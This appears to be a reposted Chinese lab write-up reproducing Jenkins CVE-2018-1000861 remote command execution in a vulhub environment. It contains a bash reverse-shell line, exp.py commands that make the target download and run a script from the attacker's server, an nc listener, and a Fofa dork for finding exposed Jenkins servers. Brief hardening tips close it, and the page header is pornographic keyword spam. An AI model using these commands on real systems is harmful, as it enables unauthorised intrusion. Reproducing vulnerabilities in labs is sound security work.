日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

Jenkins远程命令执行漏洞(CVE-2018-1000861复现)

發布時間:2025/3/15 编程问答 28 豆豆
生活随笔 收集整理的這篇文章主要介紹了 Jenkins远程命令执行漏洞(CVE-2018-1000861复现) 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

1. 漏洞描述

Jenkins使用Stapler框架開發,其允許用戶通過URL PATH來調用一次public方法。由于這個過程沒有做限制,攻擊者可以構造一些特殊的PATH來執行一些敏感的Java方法。

通過這個漏洞,我們可以找到很多可供利用的利用鏈。其中最嚴重的就是繞過Groovy沙盒導致未授權用戶可執行任意命令:Jenkins在沙盒中執行Groovy前會先檢查腳本是否有錯誤,檢查操作是沒有沙盒的,攻擊者可以通過Meta-Programming的方式,在檢查這個步驟時執行任意命令。

2.環境搭建

直接使用vulhub上的環境

(1) 下載vulhub項目,然后進入到 vulhub/jenkins/CVE-2018-1000861目錄下

(2) 執行命令:docker-compose up -d

(3)訪問:http://192.168.222.143:8080/

3.漏洞復現

此漏洞沒有回顯,直接利用orange的exp執行命令反彈shell

orang的exp

https://github.com/orangetw/awesome-jenkins-rce-2019

(1).在我們的web服務器寫txt文本內容為:

bash -i >& /dev/tcp/*.*.*.*/2333 0>&1

(2).使用exp.py執行以下命令下載文件

python exp.py http://192.168.222.143:8080/ "curl -o /tmp/1.sh http://192.168.0.103:85/1.txt"

(3).然后在我們接收shell的機器上監聽之前寫的端口

nc -lvvp 2333

(4).直接bash執行我們下載的腳本

python exp.py http://192.168.222.143:8080/ "bash /tmp/1.sh"

(5).回到監聽端口的機器

可以看到已經成功獲取到了shell

4. 漏洞指紋

Jenkins

5. Fofa Dork

app="Jenkins"

6. 防護方法

1.設置強口令

2.盡量不要開放到公網

3.限制來源IP

4.升級到最新版

總結

以上是生活随笔為你收集整理的Jenkins远程命令执行漏洞(CVE-2018-1000861复现)的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。